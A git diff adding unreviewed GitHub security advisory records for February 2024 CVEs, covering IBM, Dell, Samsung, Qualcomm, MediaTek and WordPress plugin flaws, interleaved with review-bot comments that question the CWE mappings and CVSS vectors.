@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fgv7-7rh4-3353", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22901" + ], + "details": "Vinchin Backup & Recovery v7.2 was discovered to use default MYSQL credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22901" + }, + { + "type": "WEB", + "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2024/Jan/30" + }, + { + "type": "WEB", + "url": "http://vinchin.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fh42-q9qf-98jh/GHSA-fh42-q9qf-98jh.json b/advisories/unreviewed/2024/02/GHSA-fh42-q9qf-98jh/GHSA-fh42-q9qf-98jh.json new file mode 100644 index 0000000000000..53db7e7a84cf4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fh42-q9qf-98jh/GHSA-fh42-q9qf-98jh.json 
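Review bot: `cwe_ids` is empty although the description is a textbook default-credentials finding; `"cwe_ids": ["CWE-1392"]` (Use of Default Credentials) is the current mapping, with CWE-798 as the older generic alternative. The `http://vinchin.com` reference is a plain-HTTP vendor homepage with no advisory content and should be dropped or replaced by an HTTPS link to a vendor statement if one exists. The 9.8 vector (`AV:N`/`PR:N`) presumes the MySQL service is reachable from the network with those credentials; the leakix write-up describes an RCE chain, so the score may be justified, but the `details` line alone does not establish network reachability.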
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fh42-q9qf-98jh", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-47148" + ], + "details": "IBM Storage Protect Plus Server 10.1.0 through 10.1.15.2 Admin Console could allow a remote attacker to obtain sensitive information due to improper validation of unsecured endpoints which could be used in further attacks against the system. IBM X-Force ID: 270599.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47148" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/270599" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7096482" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fjmm-xwcx-cxw3/GHSA-fjmm-xwcx-cxw3.json b/advisories/unreviewed/2024/02/GHSA-fjmm-xwcx-cxw3/GHSA-fjmm-xwcx-cxw3.json new file mode 100644 index 0000000000000..bf6124b321881 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fjmm-xwcx-cxw3/GHSA-fjmm-xwcx-cxw3.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fjmm-xwcx-cxw3", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50938" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 275128.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50938" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275128" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fm5q-rjfv-9xc2/GHSA-fm5q-rjfv-9xc2.json b/advisories/unreviewed/2024/02/GHSA-fm5q-rjfv-9xc2/GHSA-fm5q-rjfv-9xc2.json new file mode 100644 index 0000000000000..9dde49884aa66 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fm5q-rjfv-9xc2/GHSA-fm5q-rjfv-9xc2.json 
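Review bot: The vector's `UI:N` contradicts the `details` text, which requires "persuading a victim to visit a malicious Web site" — that is user interaction, `UI:R` in CVSS 3.1, and clickjacking is conventionally scored that way; `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N` yields 5.4 rather than the 6.5 recorded. `cwe_ids` carries CWE-451 (User Interface Misrepresentation), whereas CWE-1021 (Improper Restriction of Rendered UI Layers or Frames) is the CWE that specifically describes clickjacking and the one most CNAs use. Both values come from the IBM/X-Force source, so they belong in an upstream correction request rather than a local edit.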
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fm5q-rjfv-9xc2", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20007" + ], + "details": "In mp3 decoder, there is a possible out of bounds write due to a race condition. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08441369; Issue ID: ALPS08441369.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20007" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json b/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json new file mode 100644 index 0000000000000..d3719164a87dc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json 
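Review bot: `cwe_ids` is empty while the description names two weaknesses — an out-of-bounds write and the race condition that causes it — so `"cwe_ids": ["CWE-787", "CWE-362"]` captures what the text already states. The description claims "remote escalation of privilege" yet no CVSS vector is present and `severity` is null; MediaTek's bulletin assigns a severity per ALPS ID, which could be carried over if NVD does not score it. The affected chipsets and Android versions are absent from `details`, so the record is not actionable without following the bulletin link.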
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmj7-fpwq-79r4", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2023-38369" + ], + "details": "IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 261196.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38369" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/261196" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-521" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fmm6-q36g-mf2h/GHSA-fmm6-q36g-mf2h.json b/advisories/unreviewed/2024/02/GHSA-fmm6-q36g-mf2h/GHSA-fmm6-q36g-mf2h.json new file mode 100644 index 0000000000000..6d944bf865762 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fmm6-q36g-mf2h/GHSA-fmm6-q36g-mf2h.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmm6-q36g-mf2h", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-02T18:30:30Z", + "aliases": [ + "CVE-2020-29504" + ], + "details": "\nDell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.5.2, contain a Missing Required Cryptographic Step Vulnerability.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-29504" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000181115/dsa-2020-286-dell-bsafe-crypto-c-micro-edition-4-1-5-and-dell-bsafe-micro-edition-suite-4-6-multiple-security-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fp29-pg6r-vvr7/GHSA-fp29-pg6r-vvr7.json b/advisories/unreviewed/2024/02/GHSA-fp29-pg6r-vvr7/GHSA-fp29-pg6r-vvr7.json new file mode 100644 index 0000000000000..4c8ca2052f343 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fp29-pg6r-vvr7/GHSA-fp29-pg6r-vvr7.json 
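Review bot: `cwe_ids` is `CWE-295` (Improper Certificate Validation), but the `details` text describes a "Missing Required Cryptographic Step", which is CWE-325; these are different weaknesses and the mismatch will mislead anyone filtering by CWE. The `details` string also carries a leading `\n` and trailing `\n\n` that render as blank lines in the advisory view. The Dell KB slug names Micro Edition Suite "4-6" while the description says fixed before 4.5.2; the KB title presumably reflects the release in which the fixes shipped, but the 4.5.2 bound is worth confirming against the DSA before `affected` is populated.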
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fp29-pg6r-vvr7", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T18:30:30Z", + "aliases": [ + "CVE-2022-34381" + ], + "details": "\nDell BSAFE SSL-J version 7.0 and all versions prior to 6.5, and Dell BSAFE Crypto-J versions prior to 6.2.6.1 contain an unmaintained third-party component vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to the compromise of the impacted system. This is a Critical vulnerability and Dell recommends customers to upgrade at the earliest opportunity.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-34381" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000203278/dsa-2022-208-dell-bsafe-ssl-j-6-5-and-7-1-and-dell-bsafe-crypto-j-6-2-6-1-and-7-0-security-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1329" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fr9j-3pjm-gpxm/GHSA-fr9j-3pjm-gpxm.json b/advisories/unreviewed/2024/02/GHSA-fr9j-3pjm-gpxm/GHSA-fr9j-3pjm-gpxm.json new file mode 100644 index 0000000000000..892e7c000c8be --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fr9j-3pjm-gpxm/GHSA-fr9j-3pjm-gpxm.json 
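Review bot: `cwe_ids` is `CWE-1329` (Reliance on Component That is Not Updateable), but the `details` text says "unmaintained third-party component", which is CWE-1104 (Use of Unmaintained Third Party Components); CWE-1329 asserts the component cannot be patched at all, a stronger claim than the text makes. The version expression "SSL-J version 7.0 and all versions prior to 6.5" is ambiguous — read literally it leaves 6.5.x through 6.x unaffected, while the KB slug names 6.5 and 7.1 as the fixed releases, so the intended statement is probably "7.0, and 6.x before 6.5"; this needs resolving before `affected` ranges are added. The description never names the underlying component or its CVE, so a reader cannot tell which transitive vulnerability is inherited.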
@@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fr9j-3pjm-gpxm", + "modified": "2024-02-04T18:30:19Z", + "published": "2024-02-04T18:30:19Z", + "aliases": [ + "CVE-2018-25098" + ], + "details": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in blockmason credit-protocol. It has been declared as problematic. Affected by this vulnerability is the function executeUcacTx of the file contracts/CreditProtocol.sol of the component UCAC Handler. The manipulation leads to denial of service. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 082e01f18707ef995e80ebe97fcedb229a55efc5. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252799. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25098" + }, + { + "type": "WEB", + "url": "https://github.com/blockmason/credit-protocol/pull/33" + }, + { + "type": "WEB", + "url": "https://github.com/blockmason/credit-protocol/commit/082e01f18707ef995e80ebe97fcedb229a55efc5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252799" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252799" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T17:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-frh8-cgp4-p7vp/GHSA-frh8-cgp4-p7vp.json b/advisories/unreviewed/2024/02/GHSA-frh8-cgp4-p7vp/GHSA-frh8-cgp4-p7vp.json new file mode 100644 index 0000000000000..1e02aebee625f --- /dev/null 
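Review bot: `cwe_ids` `CWE-404` (Improper Resource Shutdown or Release) is VulDB's generic DoS mapping and says nothing about the actual defect in `executeUcacTx`; the linked PR #33 and commit `082e01f1` should be read to pick the real weakness class before this record is reviewed. The vector's `AV:A` is also hard to justify if the contract runs on a public chain, where any transaction sender can reach the function — `AV:N` is the usual scoring for on-chain DoS. Both values come from the VulDB feed, so treat this as a note for the review queue rather than a local edit.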
+++ b/advisories/unreviewed/2024/02/GHSA-frh8-cgp4-p7vp/GHSA-frh8-cgp4-p7vp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frh8-cgp4-p7vp", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51693" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themify Icons allows Stored XSS.This issue affects Themify Icons: from n/a through 2.0.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51693" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/themify-icons/wordpress-themify-icons-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-frmq-mwj6-5m79/GHSA-frmq-mwj6-5m79.json b/advisories/unreviewed/2024/02/GHSA-frmq-mwj6-5m79/GHSA-frmq-mwj6-5m79.json new file mode 100644 index 0000000000000..42db4dd61b486 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-frmq-mwj6-5m79/GHSA-frmq-mwj6-5m79.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frmq-mwj6-5m79", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20816" + ], + "details": "Improper authentication vulnerability in onCharacteristicWriteRequest in Auto Hotspot prior to SMR Feb-2024 Release 1 allows adjacent attackers connect to victim's mobile hotspot without user awareness.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20816" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-frpg-52qc-h9c8/GHSA-frpg-52qc-h9c8.json b/advisories/unreviewed/2024/02/GHSA-frpg-52qc-h9c8/GHSA-frpg-52qc-h9c8.json new file mode 100644 index 0000000000000..f4de34a91e504 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-frpg-52qc-h9c8/GHSA-frpg-52qc-h9c8.json 
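Review bot: `cwe_ids` is empty although the `details` text opens with "Improper authentication vulnerability", for which `"cwe_ids": ["CWE-287"]` is the direct mapping. The affected range is expressed only as "prior to SMR Feb-2024 Release 1", a patch-level identifier rather than a version, so `affected` cannot be filled without the Samsung bulletin's per-model mapping.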
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frpg-52qc-h9c8", + "modified": "2024-02-06T00:30:28Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2024-23049" + ], + "details": "An issue in symphony v.3.6.3 and before allows a remote attacker to execute arbitrary code via the log4j component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23049" + }, + { + "type": "WEB", + "url": "https://github.com/88250/symphony/issues/82" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fv23-fj7r-w7w4/GHSA-fv23-fj7r-w7w4.json b/advisories/unreviewed/2024/02/GHSA-fv23-fj7r-w7w4/GHSA-fv23-fj7r-w7w4.json new file mode 100644 index 0000000000000..4565ab221276a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fv23-fj7r-w7w4/GHSA-fv23-fj7r-w7w4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fv23-fj7r-w7w4", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43520" + ], + "details": "Memory corruption when AP includes TID to link mapping IE in the beacons and STA is parsing the beacon TID to link mapping IE.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43520" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:01Z" + } +} \ No newline at end of file 
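Review bot: The `details` text ("execute arbitrary code via the log4j component") never says which log4j defect is meant, so the record cannot be correlated with the underlying dependency advisory; if issue #82 identifies the bundled log4j version, `details` should name it and the upstream CVE it inherits. `cwe_ids` is empty and `severity` is null; for a vulnerable-dependency finding the usual mapping is `"cwe_ids": ["CWE-1395"]` (Dependency on Vulnerable Third-Party Component) rather than a code-execution CWE. `88250/symphony` appears to be a deployable application rather than a published library, so a Maven `affected` range may not be appropriate even after review.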
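Review bot: `cwe_ids` is empty for a beacon-parsing memory corruption; the description does not say whether the access is a read or a write, so the Qualcomm bulletin should be checked before choosing between CWE-787 and CWE-125 rather than guessing. The vector's `AV:N` is questionable — the attacker is the AP whose beacon the STA parses, which is over-the-air adjacent reach (`AV:A`) in most Wi-Fi scoring, and that would move the 8.6 to 7.9, still HIGH. The record carries no chipset list; that lives only in the bulletin.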
diff --git a/advisories/unreviewed/2024/02/GHSA-fvvm-3cr2-6qx2/GHSA-fvvm-3cr2-6qx2.json b/advisories/unreviewed/2024/02/GHSA-fvvm-3cr2-6qx2/GHSA-fvvm-3cr2-6qx2.json new file mode 100644 index 0000000000000..10239adc2f01e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fvvm-3cr2-6qx2/GHSA-fvvm-3cr2-6qx2.json 
@@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvvm-3cr2-6qx2", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0668" + ], + "details": "The Advanced Database Cleaner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.3 via deserialization of untrusted input in the 'process_bulk_action' function. This makes it possible for authenticated attacker, with administrator access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0668" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3025980/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fwm6-ghvh-8mr4/GHSA-fwm6-ghvh-8mr4.json b/advisories/unreviewed/2024/02/GHSA-fwm6-ghvh-8mr4/GHSA-fwm6-ghvh-8mr4.json new file mode 100644 index 0000000000000..037a375e4024c --- /dev/null 
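Review bot: `cwe_ids` is empty for what `details` explicitly calls PHP Object Injection via "deserialization of untrusted input", for which `"cwe_ids": ["CWE-502"]` is the standard mapping. The two `plugins.trac.wordpress.org/browser/…/class_clean_cron.php#L224` and `#L298` links point into a cron class, while the function named in `details` is `process_bulk_action`; confirm those anchors hit the `unserialize` call and not unrelated code before the record is reviewed. The `AC:H`/`PR:H` vector (admin-only, no POP chain in the plugin) is consistent with the text and scores 6.6, matching MODERATE.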
+++ b/advisories/unreviewed/2024/02/GHSA-fwm6-ghvh-8mr4/GHSA-fwm6-ghvh-8mr4.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwm6-ghvh-8mr4", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0859" + ], + "details": "The Affiliates Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9.34. This is due to missing or incorrect nonce validation on the process_bulk_action function in ListAffiliatesTable.php. This makes it possible for unauthenticated attackers to delete affiliates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0859" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fwwv-x7hh-wmpw/GHSA-fwwv-x7hh-wmpw.json b/advisories/unreviewed/2024/02/GHSA-fwwv-x7hh-wmpw/GHSA-fwwv-x7hh-wmpw.json new file mode 100644 index 0000000000000..e494fcdd01d97 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fwwv-x7hh-wmpw/GHSA-fwwv-x7hh-wmpw.json 
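Review bot: `cwe_ids` is empty for an explicitly described CSRF from missing nonce validation, where `"cwe_ids": ["CWE-352"]` applies. The `browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php` reference is unpinned (`trunk`), so it will drift as the plugin updates and stop showing the vulnerable code; a tag-pinned URL such as `…/tags/2.9.34/classes/ListAffiliatesTable.php` is more durable. The `UI:R`/`PR:N`/`I:L` vector is consistent with the text.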
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwwv-x7hh-wmpw", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20825" + ], + "details": "Implicit intent hijacking vulnerability in IAP of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20825" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fx38-3h42-mwm8/GHSA-fx38-3h42-mwm8.json b/advisories/unreviewed/2024/02/GHSA-fx38-3h42-mwm8/GHSA-fx38-3h42-mwm8.json new file mode 100644 index 0000000000000..2197892e0b9c3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fx38-3h42-mwm8/GHSA-fx38-3h42-mwm8.json 
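Review bot: `cwe_ids` is empty although `details` names the weakness exactly — "Implicit intent hijacking" — for which `"cwe_ids": ["CWE-927"]` (Use of Implicit Intent for Sensitive Communication) is the direct mapping. The fixed version (4.5.63.6) is stated in the text, so an `affected` entry with an introduced/fixed pair could be derived once an ecosystem is agreed, though Galaxy Store is not in any ecosystem this database currently models.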
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fx38-3h42-mwm8", + "modified": "2024-02-02T06:30:31Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2023-38019" + ], + "details": "IBM SOAR QRadar Plugin App 1.0 through 5.0.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 260575.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38019" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/260575" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7111679" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T04:15:07Z" + } +} \ No newline 